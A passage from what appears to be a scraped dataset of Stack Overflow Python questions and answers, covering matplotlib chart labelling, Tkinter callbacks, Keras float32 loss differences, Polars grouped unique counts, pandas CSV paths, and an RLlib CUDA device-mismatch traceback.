('tes-PDef3', 'West Africa'): 277.4}} df = pd.DataFrame.from_dict(dict) df.plot(kind = "bar",stacked = True) plt.show() | I have been struggling a bit with finding a way to draw lines outside the plot area but found a creative solution in this previous thread: How to draw a line outside of an axis in matplotlib (in figure coordinates). Thanks to the author for the solution once again! My proposed solution for the problem is the following (see the explanation of distinct parts in the code): import pandas as pd import matplotlib.pyplot as plt from matplotlib.lines import Line2D dict = {'BatteryStorage': {('des-PDef3', 'Central Africa'): 0.0, ('des-PDef3', 'Eastern Africa'): 2475.9, ('des-PDef3', 'North Africa'): 98.0, ('des-PDef3', 'Southern Africa'): 124.0, ('des-PDef3', 'West Africa'): 1500.24, ('pes-PDef3', 'Central Africa'): 0.0, ('pes-PDef3', 'Eastern Africa'): 58.03, ('pes-PDef3', 'North Africa'): 98.0, ('pes-PDef3', 'Southern Africa'): 124.0, ('pes-PDef3', 'West Africa'): 0.0, ('tes-PDef3', 'Central Africa'): 0.0, ('tes-PDef3', 'Eastern Africa'): 1175.86, ('tes-PDef3', 'North Africa'): 98.0, ('tes-PDef3', 'Southern Africa'): 124.0, ('tes-PDef3', 'West Africa'): 0.0}, 'Biomass PP': {('des-PDef3', 'Central Africa'): 44.24, ('des-PDef3', 'Eastern Africa'): 1362.4, ('des-PDef3', 'North Africa'): 178.29, ('des-PDef3', 'Southern Africa'): 210.01999999999998, ('des-PDef3', 'West Africa'): 277.4, ('pes-PDef3', 'Central Africa'): 44.24, ('pes-PDef3', 'Eastern Africa'): 985.36, ('pes-PDef3', 'North Africa'): 90.93, ('pes-PDef3', 'Southern Africa'): 144.99, ('pes-PDef3', 'West Africa'): 130.33, ('tes-PDef3', 'Central Africa'): 44.24, ('tes-PDef3', 'Eastern Africa'): 1362.4, ('tes-PDef3', 'North Africa'): 178.29, ('tes-PDef3', 'Southern Africa'): 210.01999999999998, ('tes-PDef3', 'West Africa'): 277.4}} df = pd.DataFrame.from_dict(dict) df.plot(kind = "bar",stacked = True) region_labels = [idx[1] for idx in df.index] #deriving the part needed for the x-labels from dict plt.tight_layout() #necessary for an appropriate display plt.legend(loc='center left', fontsize=8, frameon=False, bbox_to_anchor=(1, 0.5)) #placing lagend outside the plot area as in the Excel example ax = plt.gca() ax.set_xticklabels(region_labels, rotation=90) #coloring labels for easier interpretation for i, label in enumerate(ax.get_xticklabels()): #print(i) if i <= 4: label.set_color('red') #set favoured colors here if 9 >= i > 4: label.set_color('green') if i > 9: label.set_color('blue') plt.text(1/6, -0.5, 'des', fontweight='bold', transform=ax.transAxes, ha='center', color='red') #adding labels outside the plot area, representing the 'region group code' plt.text(3/6, -0.5, 'pes', fontweight='bold', transform=ax.transAxes, ha='center', color='green') #keep coloring respective to labels plt.text(5/6, -0.5, 'des', fontweight='bold', transform=ax.transAxes, ha='center', color='blue') plt.text(5/6, -0.6, 'b', color='white', transform=ax.transAxes, ha='center') #phantom text to trick `tight_layout` thus making space for the texts above ax2 = plt.axes([0,0,1,1], facecolor=(1,1,1,0)) #for adding lines (i.e., brackets) outside the plot area, we create new axes #creating the first bracket x_start = 0 + 0.015 x_end = 1/3 - 0.015 y = -0.42 bracket1 = [ Line2D([x_start, x_start], [y, y - 0.02], transform=ax.transAxes, color='black', lw=1.5), Line2D([x_start, x_end], [y - 0.02, y - 0.02], transform=ax.transAxes, color='black', lw=1.5), Line2D([x_end, x_end], [y - 0.02, y], transform=ax.transAxes, color='black', lw=1.5), ] for line in bracket1: ax2.add_line(line) #second bracket x_start = 1/3 + 0.015 x_end = 2/3 - 0.015 bracket2 = [ Line2D([x_start, x_start], [y, y - 0.02], transform=ax.transAxes, color='black', lw=1.5), Line2D([x_start, x_end], [y - 0.02, y - 0.02], transform=ax.transAxes, color='black', lw=1.5), Line2D([x_end, x_end], [y - 0.02, y], transform=ax.transAxes, color='black', lw=1.5), ] for line in bracket2: ax2.add_line(line) #third bracket x_start = 2/3 + 0.015 x_end = 1 - 0.015 bracket3 = [ Line2D([x_start, x_start], [y, y - 0.02], transform=ax.transAxes, color='black', lw=1.5), Line2D([x_start, x_end], [y - 0.02, y - 0.02], transform=ax.transAxes, color='black', lw=1.5), Line2D([x_end, x_end], [y - 0.02, y], transform=ax.transAxes, color='black', lw=1.5), ] for line in bracket3: ax2.add_line(line) ax2.axis("off") #turn off axes for the new axes plt.tight_layout() plt.show() Resulting in the following plot: | 1 | 3 |
79,574,000 | 2025-4-14 | https://stackoverflow.com/questions/79574000/how-to-return-a-variable-from-a-tkinter-button-command-function | I am trying to make a button that increments a variable with Tkinter, but when I 'call' (I know it isn't really calling) a function with command, i can not use return variable, as there is nowhere to return the variable to. Are there alternative ways to do this? Here is my code: import tkinter as tk variable = 0 root = tk.Tk() def variable_incrementer(): global variable variable += 1 # Not return here click_btn = tk.Button(root, text="Click me", command=variable_incrementer) click_btn.pack() root.mainloop() | You don't need to return from the call-back, Instead, you can update the label directly and you used .push() but actually Tkinter widgets uses .grid() , .pack() or .place() to display them? here is the updated code: import tkinter as tk variable = 0 root = tk.Tk() label = tk.Label(root, text=f"Count: {variable}") label.pack() def variable_incrementer(): global variable variable += 1 label.config(text=f"Count: {variable}") click_btn = tk.Button(root, text="Click me", command=variable_incrementer) click_btn.pack() root.mainloop() | 2 | 5 |
79,573,648 | 2025-4-14 | https://stackoverflow.com/questions/79573648/why-do-model-evaluate-vs-manual-loss-computation-with-model-predict-in-tf-k | I use keras and tensorflow to train a 'simple' Multilayer Perceptron (MLP) for a regression task, where I use the mean-squared error (MSE) as loss-function. I denote my training data as x_train, y_train and my test data as x_test, y_test. I recognized the following: For A and B defined as follows: A = model.evaluate(x_test, y_test) and B = loss(pred_test, y_test), where pred_test = model.predict(x_test) are the out-of-sample predictions obtained from my model, the values for A and B are (slightly) different. My question is where the difference comes from and what I can do, such that the values coincide. Below I give a minimal reproducible example in which I tried to find the answer myself (without success). My first suspicion was that this is caused by the batchwise computation, after some experimentation with the batch-sizes, this does not seem to be the case. There are related questions on this website, but the answer to this question about the same(?) problem seems to be specific to CNNs. The discussion in this post asserts that the difference is caused by the batch-wise evaluation in model.evaluate, but 1.) I really do not see how the choice of the batch-size should affect the result since in the end the average is build anyway and 2.) even if setting the batch-size to the number of samples the results are still different. This is even the case in the answer to the beformentioned post. Last, there is this thread, where the problem seems to caused by the property of the metric that it actually is variant w.r.t. to batch-sizes. However, this is not the case for the MSE! Here is the minimal example where I train a regression function on simulations: import tensorflow as tf import keras import numpy as np import random as random # for sims and seed setting random.seed(10) x = np.random.normal([0, 1, 2], [2,1,4], (200, 3)) y = x[:,0] + 0.01 * np.power(x[:,1], 2) + np.sqrt(np.abs(x[:,2] - 3)) + np.random.normal(0, 1, (200)) y = y[:,np.newaxis] x_train = x[0:100,:] y_train = y[0:100,:] x_test = x[101:200,:] y_test = y[101:200,:] # MSE def MSE(a,b): return tf.reduce_mean(tf.pow(a - b, 2)) # layers Inputs_MLP = tf.keras.Input(batch_shape = (100,3), dtype = tf.float32) Layer1_MLP = tf.keras.layers.Dense(16)(Inputs_MLP) Outputs_MLP = tf.keras.layers.Dense(1)(Layer1_MLP) # keras model model_MLP = tf.keras.Model(Inputs_MLP, Outputs_MLP) model_MLP.compile(loss = MSE) history = model_MLP.fit(x = x_train, y = y_train, epochs=5, batch_size = 25) # evaluation # out-of-sample model_MLP.evaluate(x_test, y_test, 100) # 5.561294078826904 pred_MLP_test = model_MLP.predict(x_test, batch_size = 100) MSE(pred_MLP_test, y_test) # <tf.Tensor: shape=(), dtype=float64, numpy=5.561294010797092> # in-sample model_MLP.evaluate(x_train, y_train, 100) # 5.460160732269287 pred_MLP_train = model_MLP.predict(x_train, batch_size = 100) MSE(pred_MLP_train, y_train) # <tf.Tensor: shape=(), dtype=float64, numpy=5.46016054713104> The out-of-sample evaluation yields 5.561294078826904 once and on the other hand 5.561294010797092. For this example it is only a slight difference, but it still bugs me. Also, for another (longer and more complicated) example the difference is bigger. I would appreciate any help! | Keras operates on float32 datatypes, that's what you see when you use model.evaluate(). However, when you compute MSE using your custom function, you're computing them using float64 because your y is float64. You'll see same values if you cast y into float32, something like this: # out-of-sample eval_loss = model_MLP.evaluate(x_test, y_test, batch_size=100) print(f"model.evaluate (test): {eval_loss}") pred_MLP_test = model_MLP.predict(x_test, batch_size=100) manual_mse_f64 = MSE(pred_MLP_test, y_test) print(f"Manual MSE (preds:f32, y:f64): {manual_mse_f64}") manual_mse_f32 = MSE(pred_MLP_test, tf.cast(y_test, tf.float32)) print(f"Manual MSE (preds:f32, y:f32): {manual_mse_f32}") This gives: 1/1 ━━━━━━━━━━━━━━━━━━━━ 0s 110ms/step - loss: 23.0835 model.evaluate (test): 23.0834903717041 1/1 ━━━━━━━━━━━━━━━━━━━━ 0s 62ms/step Manual MSE (preds:f32, y:f64): 23.08349212393938 Manual MSE (preds:f32, y:f32): 23.0834903717041 | 1 | 3 |
79,573,564 | 2025-4-14 | https://stackoverflow.com/questions/79573564/group-by-column-in-polars-dataframe-inside-with-columns | I have the following dataframe: import polars as pl df = pl.DataFrame({ 'ID': [1, 1, 5, 5, 7, 7, 7], 'YEAR': [2025, 2025, 2023, 2024, 2020, 2021, 2021] }) shape: (7, 2) ┌─────┬──────┐ │ ID ┆ YEAR │ │ --- ┆ --- │ │ i64 ┆ i64 │ ╞═════╪══════╡ │ 1 ┆ 2025 │ │ 1 ┆ 2025 │ │ 5 ┆ 2023 │ │ 5 ┆ 2024 │ │ 7 ┆ 2020 │ │ 7 ┆ 2021 │ │ 7 ┆ 2021 │ └─────┴──────┘ Now I would like to get the unique number of years per ID, i.e. shape: (7, 3) ┌─────┬──────┬──────────────┐ │ ID ┆ YEAR ┆ UNIQUE_YEARS │ │ --- ┆ --- ┆ --- │ │ i64 ┆ i64 ┆ u32 │ ╞═════╪══════╪══════════════╡ │ 1 ┆ 2025 ┆ 1 │ │ 1 ┆ 2025 ┆ 1 │ │ 5 ┆ 2023 ┆ 2 │ │ 5 ┆ 2024 ┆ 2 │ │ 7 ┆ 2020 ┆ 2 │ │ 7 ┆ 2021 ┆ 2 │ │ 7 ┆ 2021 ┆ 2 │ └─────┴──────┴──────────────┘ So I tried df.with_columns(pl.col('YEAR').over('ID').alias('UNIQUE_YEARS')) but this gives the wrong result. So I came up with df.join(df.group_by('ID').agg(pl.col('YEAR').unique().len().alias('UNIQUE_YEARS')), on='ID', how='left') which does gives correct result! But it looks a bit clunky, and I wonder if there is a more natural way using with_columns and over? | You can use Expr.n_unique: out = df.with_columns( pl.col('YEAR').n_unique().over('ID').alias('UNIQUE_YEARS') ) Output: shape: (7, 3) ┌─────┬──────┬──────────────┐ │ ID ┆ YEAR ┆ UNIQUE_YEARS │ │ --- ┆ --- ┆ --- │ │ i64 ┆ i64 ┆ u32 │ ╞═════╪══════╪══════════════╡ │ 1 ┆ 2025 ┆ 1 │ │ 1 ┆ 2025 ┆ 1 │ │ 5 ┆ 2023 ┆ 2 │ │ 5 ┆ 2024 ┆ 2 │ │ 7 ┆ 2020 ┆ 2 │ │ 7 ┆ 2021 ┆ 2 │ │ 7 ┆ 2021 ┆ 2 │ └─────┴──────┴──────────────┘ Similarly, groupby can take .n_unique() instead of your .unique().len(). | 1 | 3 |
79,573,037 | 2025-4-14 | https://stackoverflow.com/questions/79573037/how-to-specify-location-where-pandas-to-csv-file-is-stored-in-my-directory | So I do not know how to save the csv which this code creates to a specific folder in my directory. Any help would be appreciated! #Store rows which do not conform to the relationship in a new dataframe subset = df[df['check_total_relationship'] == False]` subset.to_csv('false_relationships.csv', index=False, header=True, encoding='utf-8')` | Just specify the folder in your directory. subset.to_csv('output_data/false_relationships.csv', index=False, header=True, encoding='utf-8') Or you can specify the absolute path subset.to_csv('/absolute-path/output_data/false_relationships.csv', index=False, header=True, encoding='utf-8') If you need to join paths you can use os.path import os BASE_DIR = os.path.dirname(os.path.abspath(__file__)) filepath = 'files/one.txt' request_path = os.path.join(BASE_DIR, filepath) | 1 | 2 |
79,568,762 | 2025-4-11 | https://stackoverflow.com/questions/79568762/i-keep-getting-this-error-cuda-available-runtimeerror-expected-all-tensors-to | I'm training a transformer model using RLlib's PPO algorithm, but I encounter a device mismatch error: RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! Despite moving all model components to the GPU with to(self.device), the error persists. CUDA is available, and the model is intended to run on the GPU. import torch import torch.nn as nn from ray.rllib.models.torch.torch_modelv2 import TorchModelV2 class SimpleTransformer(TorchModelV2, nn.Module): def __init__(self, obs_space, action_space, num_outputs, model_config, name): TorchModelV2.__init__(self, obs_space, action_space, num_outputs, model_config, name) nn.Module.__init__(self) # Configuration custom_config = model_config["custom_model_config"] self.input_dim = 76 self.seq_len = custom_config["seq_len"] self.embed_size = custom_config["embed_size"] self.nheads = custom_config["nhead"] self.nlayers = custom_config["nlayers"] self.dropout = custom_config["dropout"] self.values_out = None self.device = "cuda" if torch.cuda.is_available() else "cpu" # Input layer self.input_embed = nn.Linear(self.input_dim, self.embed_size).to(self.device) # Positional encoding self.pos_encoding = nn.Embedding(self.seq_len, self.embed_size).to(self.device) # Transformer self.transformer = nn.TransformerEncoder( nn.TransformerEncoderLayer( d_model=self.embed_size, nhead=self.nheads, dropout=self.dropout, activation='gelu', device=self.device), num_layers=self.nlayers ) # Policy and value heads self.policy_head = nn.Sequential( nn.Linear(self.embed_size + 2, 64), # Add dynamic features (wallet balance, unrealized PnL) nn.ReLU(), nn.Linear(64, num_outputs) # Action space size ).to(self.device) self.value_head = nn.Sequential( nn.Linear(self.embed_size + 2, 64), nn.ReLU(), nn.Linear(64, 1) ).to(self.device) def forward(self, input_dict, state, seq_len): # Process input x = input_dict["obs"].view(-1, self.seq_len, self.input_dim).to(self.device) dynamic_features = x[:, -1, 2:4].clone().to(self.device) x = self.input_embed(x) position = torch.arange(0, self.seq_len).unsqueeze(0).expand(x.size(0), -1).to(self.device) x = x + self.pos_encoding(position) transformer_out = self.transformer(x) last_out = transformer_out[:, -1, :] combined = torch.cat((last_out, dynamic_features), dim=1) actions = self.policy_head(combined) self.values_out = self.value_head(combined).squeeze(1) return actions, state Here is the full Error message: Trial status: 1 ERROR Current time: 2025-04-11 20:44:55. Total running time: 14s Logical resource usage: 0/12 CPUs, 0/1 GPUs (0.0/1.0 accelerator_type:G) ╭──────────────────────────────────────╮ │ Trial name status │ ├──────────────────────────────────────┤ │ PPO_CryptoEnv_a50d0_00000 ERROR │ ╰──────────────────────────────────────╯ Number of errored trials: 1 ╭────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮ │ Trial name # failures error file │ ├────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┤ │ PPO_CryptoEnv_a50d0_00000 1 C:/Users/tmpou/AppData/Local/Temp/ray/session_2025-04-11_20-44-35_479257_23712/artifacts/2025-04-11_20-44-40/PPO_2025-04-11_20-44-40/driver_artifacts/PPO_CryptoEnv_a50d0_00000_0_2025-04-11_20-44-40/error.txt │ ╰────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯ Traceback (most recent call last): File "C:\Users\tmpou\Developer\MSc AI\Deep Learning and Multi-media data\crypto_rl_bot\train.py", line 14, in <module> tune.run( File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\tune\tune.py", line 1042, in run raise TuneError("Trials did not complete", incomplete_trials) ray.tune.error.TuneError: ('Trials did not complete', [PPO_CryptoEnv_a50d0_00000]) (PPO pid=31224) 2025-04-11 20:44:55,030 ERROR actor_manager.py:517 -- Ray error, taking actor 1 out of service. The actor died because of an error raised in its creation task, ray::RolloutWorker.__init__() (pid=3964, ip=127.0.0.1, actor_id=b2fed95453b6755f07372fcb01000000, repr=<ray.rllib.evaluation.rollout_worker.RolloutWorker object at 0x000001D47885E850>) (PPO pid=31224) File "python\ray\_raylet.pyx", line 1889, in ray._raylet.execute_task (PPO pid=31224) File "python\ray\_raylet.pyx", line 1830, in ray._raylet.execute_task.function_executor (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\function_manager.py", line 724, in actor_method_executor (PPO pid=31224) return method(__ray_actor, *args, **kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 535, in __init__ (PPO pid=31224) self._update_policy_map(policy_dict=self.policy_dict) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 1743, in _update_policy_map (PPO pid=31224) self._build_policy_map( (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 1854, in _build_policy_map (PPO pid=31224) new_policy = create_policy_for_framework( (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\utils\policy.py", line 141, in create_policy_for_framework (PPO pid=31224) return policy_class(observation_space, action_space, merged_config) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\ppo\ppo_torch_policy.py", line 64, in __init__ (PPO pid=31224) self._initialize_loss_from_dummy_batch() (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\policy\policy.py", line 1484, in _initialize_loss_from_dummy_batch (PPO pid=31224) self.loss(self.model, self.dist_class, train_batch) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\ppo\ppo_torch_policy.py", line 112, in loss (PPO pid=31224) curr_action_dist.logp(train_batch[SampleBatch.ACTIONS]) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\models\torch\torch_action_dist.py", line 37, in logp (PPO pid=31224) return self.dist.log_prob(actions) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\torch\distributions\categorical.py", line 143, in log_prob (PPO pid=31224) return log_pmf.gather(-1, value).squeeze(-1) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! (when checking argument for argument index in method wrapper_CUDA_gather) (PPO pid=31224) Exception raised in creation task: The actor died because of an error raised in its creation task, ray::PPO.__init__() (pid=31224, ip=127.0.0.1, actor_id=f5d50e01341cb51a747d8a3e01000000, repr=PPO) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\worker_set.py", line 229, in _setup (PPO pid=31224) self.add_workers( (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\worker_set.py", line 682, in add_workers (PPO pid=31224) raise result.get() (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\utils\actor_manager.py", line 497, in _fetch_result (PPO pid=31224) result = ray.get(r) (PPO pid=31224) ^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\auto_init_hook.py", line 21, in auto_init_wrapper (PPO pid=31224) return fn(*args, **kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\client_mode_hook.py", line 103, in wrapper (PPO pid=31224) return func(*args, **kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\worker.py", line 2667, in get (PPO pid=31224) values, debugger_breakpoint = worker.get_objects(object_refs, timeout=timeout) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\worker.py", line 866, in get_objects (PPO pid=31224) raise value (PPO pid=31224) ray.exceptions.RayActorError: The actor died because of an error raised in its creation task, ray::RolloutWorker.__init__() (pid=3964, ip=127.0.0.1, actor_id=b2fed95453b6755f07372fcb01000000, repr=<ray.rllib.evaluation.rollout_worker.RolloutWorker object at 0x000001D47885E850>) (PPO pid=31224) File "python\ray\_raylet.pyx", line 1889, in ray._raylet.execute_task (PPO pid=31224) File "python\ray\_raylet.pyx", line 1830, in ray._raylet.execute_task.function_executor (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\function_manager.py", line 724, in actor_method_executor (PPO pid=31224) return method(__ray_actor, *args, **kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 535, in __init__ (PPO pid=31224) self._update_policy_map(policy_dict=self.policy_dict) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 1743, in _update_policy_map (PPO pid=31224) self._build_policy_map( (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\rollout_worker.py", line 1854, in _build_policy_map (PPO pid=31224) new_policy = create_policy_for_framework( (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\utils\policy.py", line 141, in create_policy_for_framework (PPO pid=31224) return policy_class(observation_space, action_space, merged_config) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\ppo\ppo_torch_policy.py", line 64, in __init__ (PPO pid=31224) self._initialize_loss_from_dummy_batch() (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\policy\policy.py", line 1484, in _initialize_loss_from_dummy_batch (PPO pid=31224) self.loss(self.model, self.dist_class, train_batch) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\ppo\ppo_torch_policy.py", line 112, in loss (PPO pid=31224) curr_action_dist.logp(train_batch[SampleBatch.ACTIONS]) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\models\torch\torch_action_dist.py", line 37, in logp (PPO pid=31224) return self.dist.log_prob(actions) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\torch\distributions\categorical.py", line 143, in log_prob (PPO pid=31224) return log_pmf.gather(-1, value).squeeze(-1) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! (when checking argument for argument index in method wrapper_CUDA_gather) (PPO pid=31224) (PPO pid=31224) During handling of the above exception, another exception occurred: (PPO pid=31224) (PPO pid=31224) ray::PPO.__init__() (pid=31224, ip=127.0.0.1, actor_id=f5d50e01341cb51a747d8a3e01000000, repr=PPO) (PPO pid=31224) File "python\ray\_raylet.pyx", line 1883, in ray._raylet.execute_task (PPO pid=31224) File "python\ray\_raylet.pyx", line 1984, in ray._raylet.execute_task (PPO pid=31224) File "python\ray\_raylet.pyx", line 1889, in ray._raylet.execute_task (PPO pid=31224) File "python\ray\_raylet.pyx", line 1830, in ray._raylet.execute_task.function_executor (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\function_manager.py", line 724, in actor_method_executor (PPO pid=31224) return method(__ray_actor, *args, **kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\algorithm.py", line 533, in __init__ (PPO pid=31224) super().__init__( (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\tune\trainable\trainable.py", line 161, in __init__ (PPO pid=31224) self.setup(copy.deepcopy(self.config)) (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span (PPO pid=31224) return method(self, *_args, **_kwargs) (PPO pid=31224) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\algorithm.py", line 631, in setup (PPO pid=31224) self.workers = WorkerSet( (PPO pid=31224) ^^^^^^^^^^ (PPO pid=31224) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\evaluation\worker_set.py", line 181, in __init__ (PPO pid=31224) raise e.args[0].args[2] (PPO pid=31224) RuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! (when checking argument for argument index in method wrapper_CUDA_gather) (RolloutWorker pid=3964) Exception raised in creation task: The actor died because of an error raised in its creation task, ray::RolloutWorker.__init__() (pid=3964, ip=127.0.0.1, actor_id=b2fed95453b6755f07372fcb01000000, repr=<ray.rllib.evaluation.rollout_worker.RolloutWorker object at 0x000001D47885E850>) (RolloutWorker pid=3964) File "python\ray\_raylet.pyx", line 1889, in ray._raylet.execute_task (RolloutWorker pid=3964) File "python\ray\_raylet.pyx", line 1830, in ray._raylet.execute_task.function_executor (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\_private\function_manager.py", line 724, in actor_method_executor (RolloutWorker pid=3964) return method(__ray_actor, *args, **kwargs) (RolloutWorker pid=3964) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\util\tracing\tracing_helper.py", line 467, in _resume_span [repeated 3x across cluster] (Ray deduplicates logs by default. Set RAY_DEDUP_LOGS=0 to disable log deduplication, or see https://docs.ray.io/en/master/ray-observability/ray-logging.html#log-deduplication for more options.) (RolloutWorker pid=3964) return method(self, *_args, **_kwargs) [repeated 3x across cluster] (RolloutWorker pid=3964) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ [repeated 3x across cluster] (RolloutWorker pid=3964) File "C:\Users\tmpou\miniconda3\envs\crypto_bot\Lib\site-packages\ray\rllib\algorithms\ppo\ppo_torch_policy.py", line 64, in __init__ [repeated 2x across cluster] (RolloutWorker pid=3964) self._update_policy_map(policy_dict=self.policy_dict) (RolloutWorker pid=3964) File 